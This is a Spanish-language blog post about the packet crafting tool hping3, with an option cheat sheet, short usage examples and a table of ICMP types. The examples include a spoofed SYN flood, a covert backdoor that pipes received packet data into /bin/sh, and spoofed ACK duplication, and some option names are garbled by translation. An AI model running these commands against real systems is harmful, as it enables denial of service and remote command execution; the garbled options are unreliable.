Sitio para la difusión de conocimiento informático.

Hping3

Hping3

hping es una herramienta de línea de comandos orientada a ensamblar y analizar paquetes TCP/IP. La interface está inspirada en la herramienta unix ping(8), pero no está limitada solo a enviar solicitudes ICMP. También soporta TCP, UDP, ICMP y protocolos RAW-IP, tiene un modo traceroute, y la habilitada de enviar archivos sobre un canal seguro, y muchas otras funcionalidades.

hping3 es completamente scriptable utilizando el lenguaje TCL. En practica esto significa que unas pocas líneas de código puede realizar cosas que normalmente tienen muchas líneas de código C.

Hping3 es la línea de comandos compatible con hping2 (pero admite más opciones), pero el núcleo de secuencias de comandos no se limita a las habituales hping2 capacidades de generación de paquetes. Por el contrario, es capaz de generar arbitrarias paquetes TCP / IP, soportando todo el IP y TCP opciones publicado.

Algunas de sus utilidades más comunes son:

Análisis de reglas de cortafuegos
Escáner de puertos avanzando
Túneles ocultos (covert-channel)
Puertas traseras
Predicción de números de secuencia
Uptime de un sistema
Denegaciones de servicio (synflood, land, udpflood… etc etc)
Formación en tcp/ip

Hping: http://www.hping.org/

 

Cheat Sheet para Hping3:

OPCIONES BASE
-q –quiet -v –version
-I –interface -V –verbose
-D –debug
-c –count contar paquetes respuesta
-i –interval segundos, uX para μsegundos [1s]
–beep beep por paquete recibido (no ICMP)
-n –numeric no resolver
-z –bind usar ctrl+z para aumentar TTL
-Z –unbind
–fase 10 paquetes / seg
–master 1 paquete / μs
–flood lo más rápido posible

OPCIONES TÍPICAS
-d –data tamaño del campo datos del paquete
-E –file insertar en datos del paquete
-e –sign longitud de firma
-j –dump mostrar paquetes recibidos en hex.
-J –print volcado en caracteres imprimibles
-B –safe reenviar paquetes perdidos
-u –end enviar EOF cuando –file
-T –traceroute modo traceroute, además:
–tr-keep-ttl para mantener TTL fijo
–tr-stop salir si no recibe paquete time ICMP exceed
–tr-no-rtt no mostrar información RTT
–tcpexitcode último tcpth_flag como código de salida

OPCIONES RELACIONADAS CON IP
-a –spoof falsear host origen
–rand-source enviar paquetes origen aleat.
–rand-dest comodín con X
-t –ttl establecer valor de TTL
-N –id identificador IP [aleatorio]
-H –ipprot protocolo IP en modo raw ip
-W –winid mostrar respuestas de Windows
-r –rel relativizar Identificador
-f –frag fragmentar paquetes [16 bytes]
-x –morefrag enviar time-exceeded de ICMP
-y –dontfrag realizar PDMTU
-g –fragoff establecer desfase de fragmento
-G –rroute incluir RECORD_ROUTE
-m –mtu valor de MTU
-o –tos establecer servicio, en HEX

OPCIONES RELACIONADAS CON ICMP
-C –icmptype tipo de petición [echo]
-K –icmpcode código ICMP [0]
–icmp-ipver versión IP [4]
–icmp-iphlen longitud de cabecera IP [5]
–icmp-iplen ip longitud del paquete, [real]
–icmp-ipid asignar identificador IP [aleat]
–icmp-ipproto protocolo IP [TCP]
–icmp-cksum valor checksum [válido]
–icmp-ts petición timestamp
–icmp-addr petición mask

RELACIONADAS CON TCP/UDP
-s –baseport [aleat], +1 si recibido
-p –destport [0], si se indica el puerto:
+puerto aumenta por paquete recibido
++puerto aumenta por paquete enviado
–keep mantener puerto de origen
-w –win establecer tamaño ventana [64]
-O –tcpoff -b –badchksum
-M –setseq -L –setack
-Q –seqnum obtener núms de secuencia
–tcp-timestamp establecer timestamp

FlAGS TCP
-F –fin -S –syn -R –rst
-P –push -A –ack -U –urg
-X –xmas -Y –ymas

SELECCIÓN DE PROTOCOLO
-0 –rawip -1 –icmp -2 –ucp
-8 –scan con:
rangos: 20-53
delimitados por coma: 1,3,4
conocidos: del /etc/services
negar con !: 1-53,!4
-9 –listen busca información según valor

 

Ejemplos:

Uptime:
hping2 -p 80 -S –tcp-timestamp host

PortScan:
hping –I eth0 –scan 20-25,80,443 -S host

Synflood:
hping –p 80 –i u10000 –a fuente –S host
S -> hping3 -I eth1 -9 secret | /bin/sh

Backdoor:
C -> hping3 -R ip -e secret -E fich_comandos -d 100

TCP ACK DUP:
Ventana 1:
hping3 –fast -S -a tu.ip_publica.va.aca -s 9909 -k -p 80 -M 0 ip.destino
Ventana 2:
hping3 –fast -S -a tu.ip_publica.va.aca -s 9909 -k -p 80 -M 123124342 ip.destino

 

Referencia – CÓDIGOS ICMP:

0 Echo Reply
1 Unassigned
2 Unassigned
3 Destination Unreachable
4 Source Quench
5 Redirect
6 Alternate Host Address
7 Unassigned
8 Echo
9 Router Advertisement
10 Router Selection
11 Time Exceeded
12 Parameter Problem
13 Timestamp
14 Timestamp Reply
15 Information Request
16 Information Reply
17 Address Mask Request
18 Address Mask Reply
19 Reservados (para seguridad)
20-29 Reservados (Experimentales)
30 Traceroute
31 Datagram Conversion Error
32 Mobile Host Redirect
33 IPv6 Where-Are-You
34 IPv6 I-Am-Here
35 Mobile Registration Request
36 Mobile Registration Reply
37 Domain Name Request
38 Domain Name Reply
39 SKIP
40 Photuris
41-255 Reservados